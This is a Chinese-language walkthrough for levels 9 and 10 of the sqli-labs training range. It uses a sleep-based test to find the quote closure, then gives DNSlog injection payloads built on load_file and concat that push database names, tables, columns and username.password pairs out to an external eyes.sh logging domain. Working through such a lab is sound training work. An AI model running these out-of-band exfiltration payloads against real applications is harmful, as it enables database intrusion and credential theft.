sqli-labs靶场less-9
本文只展示如何利用dnslog注入通过本关,注入原理可以参考我另外一篇文章
1、确定闭合方式
发现id的值不论为任何值,页面回显都是一致的You are in...
判断不存在布尔注入,报错注入
用dnslog注入,构造1' and sleep(2) --+
确定闭合方式
可以将单引号修改为",'),')),"),"))
等,查看页面回显时间,最终确定语句为
http://192.168.140.130/sq/Less-9/?id=1' and sleep(2) --+
页面回显延迟,确定闭合方式为' '
2、平台选取
打开网址 https://eyes.sh/login ,注册账号
也可以使用其他平台,更多平台可以参考我上面提到的连接
登入进去
3、dnslog注入
构造语句
http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select database()),'.zifei.eyes.sh/test.txt'))) --+
concat是为了将里面的值拼接起来
zifeiyu.eyes.sh是自己在eses.sh中注册
查看网页得到数据库名
数据库版本
爆出所有数据库
http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 0
,1),'.zifei.eyes.sh/test.txt'))) --+
http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 1
,1),'.zifei.eyes.sh/test.txt'))) --+
http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 2
,1),'.zifei.eyes.sh/test.txt'))) --+
http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 3
,1),'.zifei.eyes.sh/test.txt'))) --+
此处图片只列举一些
爆出security的所有表
- http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit
1
,1),'.zifei.eyes.sh/test.txt'))) --+- http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit
2
,1),'.zifei.eyes.sh/test.txt'))) --+- http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit
3
,1),'.zifei.eyes.sh/test.txt'))) --+
爆出列名
- http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit
0
,1),'.zifei.eyes.sh/test.txt'))) --+- http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit
1
,1),'.zifei.eyes.sh/test.txt'))) --+- http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit
1
,1),'.zifei.eyes.sh/test.txt'))) --+
爆出数据
http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select concat(username,'.',password) from security.users limit 0
,1),'.zifei.eyes.sh/test.txt'))) --+
只需要修改0的值,便可以得到所有的值
less-10
本关与第九关用dnslog通过方式一样,只不过闭合方式为"
;其他一致